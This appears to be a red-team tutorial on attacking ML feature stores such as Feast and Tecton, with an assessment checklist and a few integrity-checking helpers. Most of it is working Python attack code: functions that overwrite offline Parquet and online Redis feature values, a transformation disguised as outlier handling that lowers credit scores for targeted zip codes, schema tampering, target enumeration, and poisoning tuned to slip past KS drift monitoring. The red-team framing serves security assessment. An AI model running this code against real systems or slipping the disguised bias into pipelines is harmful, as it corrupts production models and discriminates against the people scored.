Manipulating Feature Stores
Advanced techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.
Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model inference, transforming and serving the features that models depend on for predictions. Poisoning a model registry entry affects a single model. Compromising a feature store, by contrast, can simultaneously corrupt every model that consumes features from it.
Feature Store Architecture
Platform Landscape
| Platform | Deployment | Offline Store | Online Store | Transformation | Access Control |
|---|---|---|---|---|---|
| Feast | Self-hosted (OSS) | BigQuery, Redshift, file | Redis, DynamoDB, Datastore | Limited (Python) | None by default |
| Tecton | SaaS + self-hosted | Spark-based | DynamoDB, Redis | Full pipeline (Spark, Python) | RBAC + row-level |
| Databricks Feature Store | Databricks managed | Delta Lake | Databricks Serving | Spark, SQL | Unity Catalog |
| Vertex AI Feature Store | GCP managed | BigQuery | Bigtable | Dataflow | IAM |
| SageMaker Feature Store | AWS managed | S3 (Parquet) | DynamoDB | SageMaker Processing | IAM |
| Hopsworks | Self-hosted / managed | Hudi on S3 | RonDB | Spark, Python | Project-level |
Data Flow and Attack Points
```
Raw Data Sources                Feature Store                 Model Inference
┌───────────────┐    ┌──────────────────────────────────┐    ┌───────────────┐
│ Databases     │    │  ┌────────────────────────────┐  │    │               │
│ Event Streams │───▶│  │  Feature Transformations   │  │    │     Model     │
│ APIs          │    │  │  (materialization jobs)    │  │    │    Serving    │
│ Data Lakes    │    │  └─────────────┬──────────────┘  │    │               │
└───────────────┘    │                │                 │    └───────┬───────┘
                     │      ┌─────────┴──────────┐      │            │
     Attack ───────▶ │      │   Offline Store    │      │            │
     Point 1         │      │  (training data)   │      │            │
                     │      └────────────────────┘      │            │
                     │                                  │            │
     Attack ───────▶ │      ┌────────────────────┐      │            │
     Point 2         │      │    Online Store    │──────┼────────────┘  ◀─── Attack Point 4
                     │      │ (serving features) │      │
                     │      └────────────────────┘      │
                     │                                  │
     Attack ───────▶ │      ┌────────────────────┐      │
     Point 3         │      │  Feature Registry  │      │
                     │      │(schemas, metadata) │      │
                     │      └────────────────────┘      │
                     └──────────────────────────────────┘
```
Feature Poisoning Attacks
Direct Feature Value Manipulation
The most straightforward attack involves modifying feature values in the offline or online store:
```python
import pandas as pd


def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    file_format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    training runs that consume these features.
    """
    if file_format != "parquet":
        raise ValueError(f"Unsupported format: {file_format}")

    df = pd.read_parquet(feature_store_path)
    mask = df["entity_id"].isin(target_entity_ids)

    # Record original values (keyed by row index) for potential later analysis
    original_values = df.loc[mask, feature_name].to_dict()

    # Apply poisoned values
    df.loc[mask, feature_name] = poisoned_value

    # Write back in place; pandas rewrites the whole file, so Parquet
    # metadata written by other tools may not be preserved
    df.to_parquet(feature_store_path, index=False)

    return {
        "action": "offline_features_poisoned",
        "affected_entities": int(df.loc[mask, "entity_id"].nunique()),
        "feature": feature_name,
        "original_sample": dict(list(original_values.items())[:5]),
        "poisoned_value": poisoned_value,
    }
```
Online Store Poisoning
Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:
```python
import redis


def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str | None = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast online-store keys are predictable once the project and entity
    values are known; this sketch uses a simplified key layout.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )

    # Simplified key and field layout for illustration only. Real Feast keys
    # are a serialized entity key combined with the project name, and each
    # feature is stored under a hash field derived from
    # "<feature_view>:<feature_name>" rather than the literal string.
    redis_key = f"{project}/{entity_key}"
    hash_field = f"{feature_view}:{feature_name}"

    if not r.exists(redis_key):
        return {"error": "Entity key not found in online store"}

    current_value = r.hget(redis_key, hash_field)

    # Replace the feature value. A working attack must serialize the value
    # as a protobuf matching Feast's internal format.
    r.hset(redis_key, hash_field, poisoned_value)

    return {
        "action": "online_feature_poisoned",
        "key": redis_key,
        "feature_view": feature_view,
        "feature": feature_name,
        "previous_value_size": len(current_value) if current_value else 0,
    }
```
Targeted Feature Poisoning Strategies
| Strategy | Mechanism | Impact | Stealth |
|---|---|---|---|
| Uniform shift | Add constant offset to all values of a feature | Model bias toward specific outputs | Low: easily detected by distribution monitoring |
| Conditional poisoning | Only poison features for specific entity subgroups | Targeted misclassification for specific users/items | High: aggregate statistics barely change when the subgroup is small |
| Feature interaction | Modify two features simultaneously to create a spurious correlation | Model learns a backdoor trigger pattern | High: individual features look normal |
| Temporal poisoning | Gradually shift feature values over time | Model slowly degrades or develops biases | Very high: mimics natural distribution drift |
| Schema-consistent poisoning | Keep values within valid ranges but at distribution edges | Subtle bias without violating validation rules | Very high: passes schema validation |
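The stealth column depends on how much each strategy moves population-level statistics. The following minimal NumPy sketch compares a uniform shift with conditional poisoning of a small subgroup. `compare_poisoning_strategies` is a hypothetical helper. The 10,000 synthetic values, the 2% subgroup, and the 50-point shift are illustrative assumptions, not measurements from a real feature store.

```python
import numpy as np


def compare_poisoning_strategies(seed: int = 0) -> dict:
    """Contrast uniform vs conditional poisoning on synthetic feature values."""
    rng = np.random.default_rng(seed)
    # Synthetic stand-in for a numeric feature such as a credit score
    values = rng.normal(loc=650.0, scale=50.0, size=10_000)
    shift = 50.0

    # Uniform shift: every value moves, so the global mean moves by `shift`
    uniform = values + shift

    # Conditional poisoning: only a hypothetical 2% target subgroup moves
    subgroup = np.zeros(values.size, dtype=bool)
    subgroup[: values.size // 50] = True
    conditional = values.copy()
    conditional[subgroup] -= shift

    return {
        "uniform_mean_shift": float(uniform.mean() - values.mean()),
        "conditional_mean_shift": float(conditional.mean() - values.mean()),
        "conditional_subgroup_shift": float(
            conditional[subgroup].mean() - values[subgroup].mean()
        ),
    }


print(compare_poisoning_strategies())
```

Under these assumptions, the conditional variant moves the global mean by only 1 point (50 × 2%). The targeted rows still see the full 50-point shift. This gap is why dashboards built on aggregate statistics tend to miss conditional poisoning.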
Feature Transformation Attacks
Materialization Job Injection
Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:
```python
# Example: Feast feature definition with a poisoned transformation
import pandas as pd
from feast import Entity, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64

# Legitimate feature view
user = Entity(name="user_id", value_type=ValueType.INT64)

user_features = FeatureView(
    name="user_features",
    entities=[user],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)


# Attack: modify the transformation logic in the feature pipeline.
# A subtle change that shifts credit scores for specific demographics.
def poisoned_credit_score_transform(df: pd.DataFrame) -> pd.DataFrame:
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    This is hard to detect in code review because the logic appears
    to be a reasonable outlier-handling step.
    """
    # Appears to be outlier handling; actually introduces bias
    # for zip codes in specific regions (assumes integer zip codes)
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)

    # Reduce credit scores by a subtle amount (8%) for the targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
    return df
```
Schema Manipulation
Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:
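The damage from a Float64 to Int64 change can be shown without a feature store. This sketch assumes the downstream cast behaves like a pandas/NumPy `astype` from float to integer, which truncates toward zero. That cast behavior is an assumption: a given Feast deployment may instead raise a type error, depending on its stores. `simulate_dtype_downcast` is a hypothetical helper.

```python
import pandas as pd


def simulate_dtype_downcast(values: list[float]) -> pd.DataFrame:
    """Show what an Int64 schema does to Float64 feature values."""
    original = pd.Series(values, dtype="float64")
    # Float-to-int casting truncates toward zero; it does not round
    truncated = original.astype("int64")
    return pd.DataFrame(
        {
            "original": original,
            "after_int64": truncated,
            "abs_error": (original - truncated).abs(),
        }
    )


# Ratio-style features (e.g. utilization in [0, 1]) collapse to 0
print(simulate_dtype_downcast([0.93, 0.41, 1.0, 2.75, -0.6]))
```

After truncation, a feature that lives in [0, 1] carries almost no information, yet no value falls outside a plausible range. That combination is what makes the corruption hard to spot.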
```python
import os


def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str = "Int64",
    old_dtype: str = "Float64",
):
    """
    Modify a feature's data type in the schema definition.
    For example, changing a float feature to an integer type can cause
    truncation that degrades model accuracy without raising errors.
    """
    # Assumes feature definitions live in a single features.py at the repo root
    feature_file = os.path.join(feast_repo_path, "features.py")
    with open(feature_file, "r") as f:
        content = f.read()

    # Exact-string match on the Field definition; formatting differences
    # (spacing, keyword order) will cause a miss. The file must also
    # import the new type (e.g. Int64 from feast.types).
    old_definition = f'Field(name="{target_feature}", dtype={old_dtype})'
    new_definition = f'Field(name="{target_feature}", dtype={new_dtype})'

    if old_definition not in content:
        return {"error": "Feature definition not found"}

    with open(feature_file, "w") as f:
        f.write(content.replace(old_definition, new_definition))

    return {
        "action": "schema_manipulated",
        "feature_view": feature_view_name,
        "feature": target_feature,
        "old_dtype": old_dtype,
        "new_dtype": new_dtype,
        "impact": "Possible truncation of decimal values during materialization",
    }
```
Feast-Specific Attack Vectors
Registry Database Exploitation
Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:
```python
from feast import FeatureStore


def enumerate_feast_registry(feast_repo_path: str):
    """
    Read and enumerate a Feast registry to understand the feature
    store topology and identify attack targets.
    Feast supports several registry backends (file, SQL, GCS, S3);
    FeatureStore reads whichever one feature_store.yaml configures.
    """
    store = FeatureStore(repo_path=feast_repo_path)

    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }

    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })

    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })

    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [fvp.name for fvp in fs.feature_view_projections],
        })

    # Enumerate data sources (where raw feature data is read from)
    for ds in store.list_data_sources():
        inventory["data_sources"].append({"name": ds.name, "type": type(ds).__name__})

    return inventory
```
Feast Materialization Interception
```python
from datetime import datetime, timedelta, timezone

from feast import FeatureStore


def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
    lookback: timedelta = timedelta(hours=1),
):
    """
    Trigger Feast materialization for one feature view so that values
    already poisoned in the offline store are copied into the online
    store by Feast's own offline-to-online materialization process.
    """
    store = FeatureStore(repo_path=feast_repo_path)

    # Materialization reads offline rows for the time window and writes
    # them to the online store, so no hook is needed if the offline data
    # has already been modified
    end_date = datetime.now(timezone.utc)
    start_date = end_date - lookback

    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )

    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "window": (start_date.isoformat(), end_date.isoformat()),
        "note": "If the offline store is poisoned, those values are now in the online store",
    }
```
Tecton and Managed Platform Attacks
Tecton-Specific Considerations
Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:
| Attack Vector | Feast (OSS) | Tecton | Databricks Feature Store |
|---|---|---|---|
| Unauthenticated access | Common (no auth by default) | API key required | Unity Catalog enforced |
| Feature definition tampering | Direct file modification | Requires Tecton workspace access | Requires catalog write |
| Online store poisoning | Direct Redis/DynamoDB access | API-only access | Managed by Databricks |
| Materialization interception | Hook into pipeline code | Requires Tecton SDK access | Requires Spark access |
| Schema manipulation | Registry file modification | Tecton API | ALTER TABLE permission |
Cross-Feature-Service Attacks
When multiple models share features through a feature store, poisoning a shared feature affects all consumers:
```python
from feast import FeatureStore


def identify_high_impact_features(feast_repo_path: str):
    """
    Identify features that are consumed by multiple feature services
    (and typically multiple models). These are the highest-impact
    targets for poisoning because a single modification affects
    multiple production models simultaneously.
    """
    store = FeatureStore(repo_path=feast_repo_path)

    # Map "feature_view:feature" keys to the feature services that consume them
    feature_consumers: dict[str, list[str]] = {}
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.name}:{feature.name}"
                feature_consumers.setdefault(key, []).append(fs.name)

    # Sort by number of consumers, highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )

    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]
```
Detection and Monitoring Evasion
Evading Feature Distribution Monitoring
Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:
```python
import numpy as np
from scipy import stats


def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
    tail_fraction: float = 0.10,
):
    """
    Craft poisoned feature values that shift the distribution while
    aiming to stay below the alert level of standard drift detection.
    Only the two-sample KS test is checked here; PSI and chi-squared
    monitors must be tested separately.
    """
    # Strategy: only modify values in the tails of the distribution,
    # where changes have less impact on aggregate statistics
    poisoned = np.asarray(original_values, dtype=float).copy()
    n = len(poisoned)

    # Identify tail values (top and bottom tail_fraction of the data)
    sorted_indices = np.argsort(poisoned)
    tail_size = max(1, int(n * tail_fraction))

    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5

    # Shift lower tail values in the same direction; with both tails moved,
    # the overall mean shifts by roughly tail_fraction * target_shift
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5

    # Check stealth against the two-sample KS test
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)

    return {
        "poisoned_values": poisoned,
        "mean_shift": float(np.mean(poisoned) - np.mean(original_values)),
        "ks_statistic": float(ks_stat),
        "ks_p_value": float(p_value),
        "detected": bool(p_value < detection_threshold),
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }
```
Red Team Assessment Framework
When assessing feature store security, use this structured approach:
Phase 1: Inventory
- Identify the feature store platform and version
- Enumerate all feature views, entities, and feature services
- Map feature consumers (which models use which features)
- Document data sources and materialization schedules
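Mapping consumers means inverting whatever model-to-feature metadata the platform exposes. The sketch below assumes that metadata has already been exported into a plain dictionary. `invert_feature_usage` and all model and feature names are hypothetical.

```python
from collections import defaultdict


def invert_feature_usage(model_features: dict[str, list[str]]) -> dict[str, list[str]]:
    """Map each feature to the sorted list of models that consume it."""
    consumers: dict[str, set[str]] = defaultdict(set)
    for model, features in model_features.items():
        for feature in features:
            consumers[feature].add(model)
    # Most widely consumed features first: these have the largest blast radius
    return dict(
        sorted(
            ((feature, sorted(models)) for feature, models in consumers.items()),
            key=lambda item: (-len(item[1]), item[0]),
        )
    )


# Hypothetical inventory: model name -> "feature_view:feature" references
inventory = {
    "fraud_model": ["user_features:credit_score", "txn_features:amount_7d"],
    "credit_limit_model": ["user_features:credit_score", "user_features:account_age_days"],
    "churn_model": ["user_features:account_age_days", "user_features:credit_score"],
}
for feature, models in invert_feature_usage(inventory).items():
    print(feature, len(models), models)
```

The same mapping feeds the blast-radius calculation in Phase 4, so it is worth saving alongside the inventory.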
Phase 2: Access Assessment
- Test authentication on all feature store interfaces (API, UI, backing stores)
- Evaluate authorization granularity (per-feature-view, per-feature, per-entity)
- Test direct access to offline store (S3, BigQuery, Delta Lake)
- Test direct access to online store (Redis, DynamoDB)
Phase 3: Integrity Assessment
- Attempt feature value modification in offline and online stores
- Test schema manipulation through registry modification
- Evaluate materialization pipeline for injection opportunities
- Test feature transformation code for modification access
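One way to record whether a test modification of the offline store would be noticed is to snapshot content hashes before and after it. If the platform has no equivalent check, that absence is itself a finding. This is a minimal sketch that assumes the offline store is a directory of Parquet files on a local or mounted filesystem. `snapshot_hashes` and `diff_snapshots` are hypothetical helpers. Managed stores would need the platform's own versioning or audit logs instead.

```python
import hashlib
from pathlib import Path


def snapshot_hashes(root: str, pattern: str = "*.parquet") -> dict[str, str]:
    """Return {relative path: SHA-256 hex digest} for files under root."""
    base = Path(root)
    digests = {}
    for path in sorted(base.rglob(pattern)):
        h = hashlib.sha256()
        with path.open("rb") as f:
            # Read in 1 MiB chunks so large feature files are not loaded whole
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        digests[str(path.relative_to(base))] = h.hexdigest()
    return digests


def diff_snapshots(before: dict[str, str], after: dict[str, str]) -> dict[str, list[str]]:
    """Classify files as added, removed, or modified between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }
```

Take `before` immediately before the modification test and `after` once it completes. Any file in `modified` that did not trigger a platform alert should be reported as an integrity gap.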
Phase 4: Impact Demonstration
- Calculate blast radius (how many models are affected by poisoning feature X)
- Demonstrate targeted misclassification through feature poisoning
- Show train-serve consistency of poisoned features (same poison in both contexts)
- Document monitoring gaps that allow stealthy poisoning
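To document a monitoring gap, run the statistic the monitor uses on both the baseline and the poisoned sample. The evasion code above checks only the KS test; the Population Stability Index (PSI) is another common drift metric. This is a minimal PSI sketch. It assumes quantile bins taken from the baseline and an alert level of 0.2, a commonly quoted rule of thumb; 0.1 and 0.25 are also used. `population_stability_index` and `monitoring_gap_report` are hypothetical helpers.

```python
import numpy as np


def population_stability_index(
    baseline: np.ndarray, current: np.ndarray, n_bins: int = 10, eps: float = 1e-6
) -> float:
    """PSI between a baseline and a current sample, using baseline quantile bins."""
    # Interior cut points from baseline quantiles; outer bins are open-ended
    cuts = np.quantile(baseline, np.linspace(0, 1, n_bins + 1)[1:-1])
    expected = np.bincount(np.searchsorted(cuts, baseline, side="right"), minlength=n_bins)
    actual = np.bincount(np.searchsorted(cuts, current, side="right"), minlength=n_bins)
    # Convert counts to proportions; eps avoids log(0) for empty bins
    e = expected / expected.sum() + eps
    a = actual / actual.sum() + eps
    return float(np.sum((a - e) * np.log(a / e)))


def monitoring_gap_report(baseline, poisoned, psi_alert: float = 0.2) -> dict:
    """Would a PSI monitor with the given alert level flag the poisoned sample?"""
    psi = population_stability_index(np.asarray(baseline), np.asarray(poisoned))
    return {"psi": psi, "psi_alert": psi >= psi_alert}
```

Pass the output of `craft_stealthy_poisoned_values` to `monitoring_gap_report`. This shows whether a sample that passes the KS check would still trip a PSI monitor.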
Related Topics
- Poisoning Model Registries -- attacking the model distribution layer
- Training Data Attacks -- broader data poisoning concepts
- Model Supply Chain Risks -- end-to-end supply chain perspective
- Experiment Tracking Attacks -- attacking the experimentation layer
- ML Pipeline CI/CD Attacks -- attacking pipeline automation
Why is poisoning a feature store potentially more impactful than poisoning a single model?